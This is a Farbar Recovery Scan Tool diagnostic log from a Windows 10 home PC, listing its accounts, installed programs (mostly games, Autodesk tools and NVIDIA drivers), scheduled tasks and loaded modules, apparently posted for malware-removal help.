StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe] => Enabled:CodeMeter Runtime Server
==================== Restore Points =========================
Could not list restore points
Check "winmgmt" service or repair WMI.
==================== Faulty Device Manager Devices =============
Could not list Devices. Check "winmgmt" service or repair WMI.
==================== Event log errors: =========================
Could not start eventlog service, could not read events.
System error 123 has occurred.
The filename, directory name, or volume label syntax is incorrect.
==================== Memory info ===========================
Processor: Intel(R) Core(TM) i5-6600K CPU @ 3.50GHz
Percentage of memory in use: 20%
Total physical RAM: 16339.81 MB
Available physical RAM: 12949.95 MB
Total Virtual: 16339.81 MB
Available Virtual: 13025.66 MB
==================== Drives ================================
Drive c: (Systém) (Fixed) (Total:194.76 GB) (Free:64.23 GB) NTFS
Drive d: (Data) (Fixed) (Total:736.2 GB) (Free:46.62 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or (Size: 931.5 GB) (Disk ID: 00000000)
Partition: GPT.
==================== End of Addition.txt ============================
Ran by Nekut (16-03-2017 16:48:03)
Running from C:\Users\Nekut\Desktop
Windows 10 Home Version 1607 (X64) (2016-09-27 17:22:44)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-2417313614-488722605-2671369154-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2417313614-488722605-2671369154-503 - Limited - Disabled)
Guest (S-1-5-21-2417313614-488722605-2671369154-501 - Limited - Disabled)
Nekut (S-1-5-21-2417313614-488722605-2671369154-1001 - Administrator - Enabled) => C:\Users\Nekut
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
3DMark 11 (HKLM-x32\...\{f9e83b9c-ab7e-4005-8f32-4ea69703a5e4}) (Version: 1.0.132.0 - Futuremark)
3DMark 11 (Version: 1.0.132.0 - Futuremark) Hidden
4Story CZ 5.2.233 (HKLM-x32\...\4Story_CZ_is1) (Version: 5.2.233 - Gameforge4D GmbH)
A360 Desktop (HKLM\...\{7758802D-9486-4883-9927-CCAC366A3BA4}) (Version: 7.2.3.1800 - Autodesk)
ACAD Private (Version: 21.0.52.0 - Autodesk) Hidden
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 15.023.20070 - Adobe Systems Incorporated)
Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated)
Age of Chivalry (HKLM-x32\...\Steam App 17510) (Version: - Team Chivalry)
AIDA64 Extreme v5.00 (HKLM-x32\...\AIDA64 Extreme_is1) (Version: 5.00 - FinalWire Ltd.)
Amnesia. A Machine for Pigs, âĺđńč˙ 1.0 (HKLM-x32\...\Amnesia. A Machine for Pigs_is1) (Version: 1.0 - DangeSecond)
Ansel (Version: 376.19 - NVIDIA Corporation) Hidden
ASTRO Command Center (HKLM-x32\...\{78FAE775-D963-4031-97CC-75D96FF648EB}) (Version: 1.0.121 - Astro Gaming)
AutoCAD 2017 - English (Version: 21.0.52.0 - Autodesk) Hidden
AutoCAD 2017 (Version: 21.0.52.0 - Autodesk) Hidden
AutoCAD 2017 Language Pack - English (Version: 21.0.52.0 - Autodesk) Hidden
Autodesk Advanced Material Library Image Library 2017 (HKLM-x32\...\{8ED2ED41-4455-449D-993C-751C039089B9}) (Version: 15.11.3.0 - Autodesk)
Autodesk App Manager 2016-2017 (HKLM-x32\...\{C0954809-F5DC-426C-847E-8409DE14E4C0}) (Version: 2.2.0 - Autodesk)
Autodesk AutoCAD 2017 - English (HKLM\...\AutoCAD 2017 - English) (Version: 21.0.52.0 - Autodesk)
Autodesk AutoCAD Performance Feedback Tool 1.2.5 (HKLM-x32\...\{8600F844-9AA5-412E-B6F2-F9C6CBCFD268}) (Version: 1.2.5.0 - Autodesk)
Autodesk BIM 360 Glue AutoCAD 2017 Add-in 64 bit (HKLM\...\{276A67E0-71EB-4827-B5F7-2ACF02BC1A5B}) (Version: 4.37.6853 - Autodesk)
Autodesk License Service (x64) - 3.1 (HKLM\...\{EB6FE58F-8576-4272-BB9C-6B47D9EDFA4D}) (Version: 3.1.26.0 - Autodesk)
Autodesk Material Library 2017 (HKLM-x32\...\{8FB9F735-D64C-4991-8D91-4CDDAB1ABDEE}) (Version: 15.11.3.0 - Autodesk)
Autodesk Material Library Base Resolution Image Library 2017 (HKLM-x32\...\{3FBFBC43-9882-43FA-B979-2D53896747B3}) (Version: 15.11.3.0 - Autodesk)
Autodesk ReCap 360 (HKLM\...\Autodesk ReCap 360) (Version: 3.0.0.52 - Autodesk)
Autodesk ReCap 360 (Version: 3.0.0.52 - Autodesk) Hidden
AVG Zen (Version: 1.22.1 - AVG Technologies) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
BitTorrent (HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\BitTorrent) (Version: 7.9.9.43296 - BitTorrent Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.24 - Piriform)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.5.5790 - CDBurnerXP)
Cities Skylines Natural Disasters (HKLM-x32\...\Cities Skylines Natural Disasters_is1) (Version: - )
CodeMeter Runtime Kit v5.10a (HKLM\...\{CADFF08A-A157-474F-B6A8-8F26F81F7ABE}) (Version: 5.10.1224.501 - WIBU-SYSTEMS AG)
COMODO Internet Security Premium (HKLM\...\COMODO Internet Security) (Version: 10.0.0.6092 - COMODO Security Solutions Inc.)
COMODO Internet Security Premium (Version: 10.0.0.6092 - COMODO Security Solutions Inc.) Hidden
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.1.0.0074 - Disc Soft Ltd)
Dragon Age™: Inquisition (HKLM-x32\...\{DC4C36DC-4E5B-4262-B0C7-157DF534B969}) (Version: 1.0.0.11 - Electronic Arts)
Euro Truck Simulator 2 (HKLM-x32\...\Euro Truck Simulator 2_R.G. Mechanics_is1) (Version: - R.G. Mechanics, markfiter)
Farming Simulator 15 (HKLM-x32\...\Farming Simulator 15_R.G. Mechanics_is1) (Version: - R.G. Mechanics, markfiter)
Fraps (HKLM-x32\...\Fraps) (Version: - )
Futuremark SystemInfo (HKLM-x32\...\{032DC00A-51D1-4D28-BFB7-1D0E85291E11}) (Version: 4.25.366 - Futuremark)
Gameforge Live 2.0.12 (HKLM-x32\...\{9C98989A-3A15-42DA-A3B9-D20331437D67}}_is1) (Version: 2.0.12 - Gameforge)
Goat Simulator Waste of Space (HKLM\...\Z29hdHNpbXVsYXRvcg_is1) (Version: 1 - )
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 56.0.2924.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Grand Theft Auto San Andreas version 1.1.0.0 (HKLM-x32\...\Grand Theft Auto San Andreas_is1) (Version: 1.1.0.0 - Mr DJ)
Cheat Engine 6.5 (HKLM-x32\...\Cheat Engine 6.5_is1) (Version: - Cheat Engine)
Import souborů SketchUp 2016-2017 (HKLM-x32\...\{063925DB-9D8C-48E2-8F04-1B7038B6C783}) (Version: 2.2.0 - Autodesk)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1153 - Intel Corporation)
Intel(R) Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 30.100.1519.7 - Intel Corporation)
Intel® Chipset Device Software (x32 Version: 10.0.27 - Intel(R) Corporation) Hidden
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: - )
IsoBuster 3.7 (HKLM-x32\...\IsoBuster_is1) (Version: 3.7 - Smart Projects)
Java 8 Update 66 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218066F0}) (Version: 8.0.660.18 - Oracle Corporation)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.410 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.410 - LogMeIn, Inc.) Hidden
LOOT version 0.9.2 (HKLM-x32\...\{BF634210-A0D4-443F-A657-0DCE38040374}_is1) (Version: 0.9.2 - LOOT Team)
Malwarebytes verze 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\OneDriveSetup.exe) (Version: 17.3.6798.0207 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50905.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{51adbf11-493f-431c-a862-967a0fae2944}) (Version: 12.0.21005.1 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210 (HKLM-x32\...\{f144e08f-9cbe-4f09-9a8c-f2b858b7ee7f}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM-x32\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\Minecraft) (Version: 1.8.8 - Minecraft)
Minimal ADB and Fastboot version 1.4.2 (HKLM-x32\...\{1901BAF7-7E78-4041-BC88-D0EE5DD1DFD9}_is1) (Version: 1.4.2 - Sam Rodberg)
Mount and Blade Warband - Viking Conquest (HKLM-x32\...\Mount and Blade Warband - Viking Conquest_is1) (Version: - )
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.62.1 - Black Tree Gaming)
NVIDIA 3D Vision Controller Driver 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.4.0.70 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.4.0.70 - NVIDIA Corporation)
NVIDIA Ovladač 3D Vision 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 376.53 - NVIDIA Corporation)
NVIDIA Ovladač HD audia 1.3.34.17 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.17 - NVIDIA Corporation)
NVIDIA Ovladače grafiky 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 376.53 - NVIDIA Corporation)
NVIDIA Systémový software PhysX 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (Version: 3.4.0.70 - NVIDIA Corporation) Hidden
NvTelemetry (Version: 2.3.16.0 - NVIDIA Corporation) Hidden
NvvHci (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
O&O Defrag Professional (HKLM\...\{50C961A1-889F-4A4E-9587-2772A45B6AAD}) (Version: 18.0.39 - O&O Software GmbH)
OpenOffice 4.1.1 (HKLM-x32\...\{C560D6E7-E40A-435D-8B71-62CBCF1701B2}) (Version: 4.11.9775 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 9.7.2.53208 - Electronic Arts, Inc.)
Overwolf (HKLM-x32\...\Overwolf) (Version: 0.103.32.0 - Overwolf Ltd.)
Ovládací panel NVIDIA 376.53 (Version: 376.53 - NVIDIA Corporation) Hidden
Path of Exile (HKLM-x32\...\{52797cef-39ff-4ea9-b055-4f9a336b412d}) (Version: 2.2.1.53465 - Grinding Gear Games)
Path of Exile (x32 Version: 2.2.1.53465 - Grinding Gear Games) Hidden
Počítačová aplikace Autodesk (HKLM-x32\...\Autodesk Desktop App) (Version: 6.2.0.174 - Autodesk)
Process Lasso (HKLM-x32\...\ProcessLasso) (Version: 8.9.8.6 - Bitsum)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Shadow.Warrior.2.Deluxe.Edition.[v.1.1.3.0]-ALI213 verze 1.1.3.0 (HKLM-x32\...\{ACB6FC5F-552D-4C67-A0F5-25555114841B}}_is1) (Version: 1.1.3.0 - Ali213.net)
Shelter 2 Mountains (HKLM-x32\...\Shelter 2 Mountains_is1) (Version: - )
SHIELD Streaming (Version: 7.1.0351 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 3.4.0.70 - NVIDIA Corporation) Hidden
SimCity (HKLM-x32\...\SimCity_R.G. Mechanics_is1) (Version: - R.G. Mechanics, markfiter)
Simple Port Forwarding (HKLM-x32\...\Simple Port Forwarding) (Version: 3.8.5 - PcWinTech.com)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype™ 7.26 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.26.101 - Skype Technologies S.A.)
Skyrim Script Extender (SKSE) (HKLM\...\Steam App 365720) (Version: - The SKSE Team)
Sophos Virus Removal Tool (HKLM-x32\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.5.6 - Sophos Limited)
Speciální aplikace Autodesk 2016-2017 (HKLM-x32\...\{27C15055-713B-4D0E-881F-19598A2DFD59}) (Version: 2.2.0 - Autodesk)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version: - )
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Sync withSIX (HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Sync) (Version: 1.2.7 - SIX Networks GmbH)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios)
The Elder Scrolls V: Skyrim (HKLM\...\Steam App 72850) (Version: - Bethesda Game Studios)
Tunngle (HKLM-x32\...\Tunngle_is1) (Version: 5.7 - Tunngle.net GmbH)
Uplay (HKLM-x32\...\Uplay) (Version: 10.0 - Ubisoft)
Vietcong (HKLM-x32\...\Vietcong) (Version: - )
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
War Thunder (HKLM-x32\...\Steam App 236390) (Version: - Gaijin Entertainment)
WibuKey Setup (WibuKey Remove) (HKLM\...\{00060000-0000-1004-8002-0000C06B5161}) (Version: Version 6.20 of 2013-Dec-18 (Build 1230) (Setup) - WIBU-SYSTEMS AG)
WinRAR 5.11 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.11.0 - win.rar GmbH)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment)
Zemana AntiMalware (HKLM-x32\...\{8F0CD7D1-42F3-4195-95CD-833578D45057}_is1) (Version: 2.72.0.176 - Zemana Ltd.)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-2417313614-488722605-2671369154-1001_Classes\CLSID\{0D327DA6-B4DF-4842-B833-2CFF84F0948F}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2017\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-2417313614-488722605-2671369154-1001_Classes\CLSID\{720DB9AF-D62C-4ED0-A377-429C22312852}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2017\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-2417313614-488722605-2671369154-1001_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> C:\Program Files\Autodesk\AutoCAD 2017\en-US\acadficn.dll (Autodesk, Inc.)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0A6FCFBF-96B1-40CB-97E3-794BCDC6F58D} - System32\Tasks\COMODO\COMODO Update {A6D52E4F-569B-4756-B3D8-DF217313DA85} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {0BCFA1A1-1EC5-4C87-9B57-941443E89977} - System32\Tasks\{7FD848FE-342B-446D-9D31-7734C94947D8} => pcalua.exe -a C:\Users\Nekut\Downloads\gtasa120cz\gtasa120cz.exe -d C:\Users\Nekut\Downloads\gtasa120cz
Task: {14D797F9-BB6D-4144-9C3D-88C2500CDCBF} - System32\Tasks\COMODO\COMODO CMC {06A09C0F-DD9C-4191-A670-71115CD78627} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {196522D8-4BD8-4B31-9FB8-ACCC7A483E1C} - System32\Tasks\COMODO\COMODO Signature Update {B9D5C6F9-17D2-4917-8BD0-614BAA1C6A59} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {325CB902-3891-4E6E-BA9D-28F802BC176F} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-02-23] (NVIDIA Corporation)
Task: {3A6CCA04-E5F4-4F90-A680-A9A5F23F824A} - System32\Tasks\COMODO\COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-12-28] (COMODO)
Task: {49E243E0-ACAD-4373-A823-590D9DB02FB3} - System32\Tasks\COMODO\COMODO Scan {F140D794-60B6-4F00-9235-D6457AA25B22} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {5A92D064-2115-424F-B351-9FC49340E33C} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {6899F673-0F07-468E-91E7-4E56DB0619BD} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe
Task: {6D5927DD-BEE1-4A03-B7E2-2F0A02CC0EAF} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-08-26] (Adobe Systems Incorporated)
Task: {77FC23CE-5778-4997-86B6-0AF9DAB6C840} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-26] (Google Inc.)
Task: {8018887D-23B5-49E9-8F6E-9CB31F63A62B} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-02-23] (NVIDIA Corporation)
Task: {9C974213-F562-4CFD-9A9D-4D8A098C7FC6} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-03-14] (Microsoft Corporation)
Task: {A345A326-3A14-4A3E-94B7-67267B52B398} - System32\Tasks\COMODO\COMODO Maintenance {947247B5-026A-4437-9371-770782BE839D} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {A4444133-6A7C-4E6D-B090-92C841E301BC} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Nekut\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {AD71B9D6-2F01-49C5-B83B-76A1EA3B8567} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-11-15] (Piriform Ltd)
Task: {B0A7E0C4-9457-4CE3-848D-39E42D97A27E} - System32\Tasks\Process Lasso Core Engine Only => C:\Program Files\Process Lasso\processgovernor.exe [2016-05-14] (Bitsum LLC)
Task: {CD657602-AFE7-44B3-9A17-AEFCE46EFB45} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-02-23] (NVIDIA Corporation)
Task: {D8F861CA-EAE2-4146-859A-E6905C624F61} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-02-23] (NVIDIA Corporation)
Task: {DA40F702-D2CF-4F91-9255-A83784B68B66} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-02-23] (NVIDIA Corporation)
Task: {DAAE4093-1005-4A30-B9A8-A828D3FF22D3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-26] (Google Inc.)
Task: {E47E59FE-19EC-43C8-B8ED-E60CA8049AF6} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-02-23] (NVIDIA Corporation)
Task: {EC723377-1EB3-4815-804B-63A20A982CCA} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-02-23] (NVIDIA Corporation)
Task: {EF979201-DB6D-4829-A4FF-7E323A52458E} - System32\Tasks\Process Lasso Management Console (GUI) => C:\Program Files\Process Lasso\processlasso.exe [2016-05-14] (Bitsum LLC)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
Shortcut: C:\Users\Nekut\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Simple Port Forwarding\SPF - Basic UI Mode.lnk -> C:\Program Files (x86)\Simple Port Forwarding\basic_ui.bat ()
==================== Loaded Modules (Whitelisted) ==============
2016-10-01 14:49 - 2017-02-23 19:35 - 04489152 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\Poco.dll
2016-10-01 14:49 - 2017-02-23 19:35 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-03-15 17:30 - 2017-02-24 06:23 - 02264352 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
2017-03-15 17:30 - 2017-02-24 06:23 - 02264528 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2016-12-28 00:17 - 2016-12-28 00:17 - 00155320 _____ () C:\Program Files\COMODO\COMODO Internet Security\cmdwrhlp.dll
2016-12-28 00:16 - 2016-12-28 00:16 - 00107704 _____ () C:\Program Files\COMODO\COMODO Internet Security\cavwpps.dll
2016-12-28 00:16 - 2016-12-28 00:16 - 00179896 _____ () C:\Program Files\COMODO\COMODO Internet Security\cmdcomps.dll
2016-03-16 10:25 - 2016-03-16 10:25 - 00073912 _____ () C:\Program Files\COMODO\COMODO Internet Security\scanners\smart.cav
2016-07-16 12:42 - 2016-07-16 12:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2017-03-14 18:35 - 2017-03-04 08:19 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-09-27 18:02 - 2016-12-29 13:44 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2017-03-14 18:35 - 2017-03-04 08:19 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2017-03-14 18:35 - 2017-03-04 08:19 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-27 18:57 - 2016-09-27 18:57 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-03-14 18:34 - 2017-03-04 07:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-03-14 18:35 - 2017-03-04 07:12 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-03-14 18:35 - 2017-03-04 07:05 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-03-14 18:35 - 2017-03-04 07:05 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-03-14 18:35 - 2017-03-04 07:05 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-03-14 18:35 - 2017-03-04 07:05 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
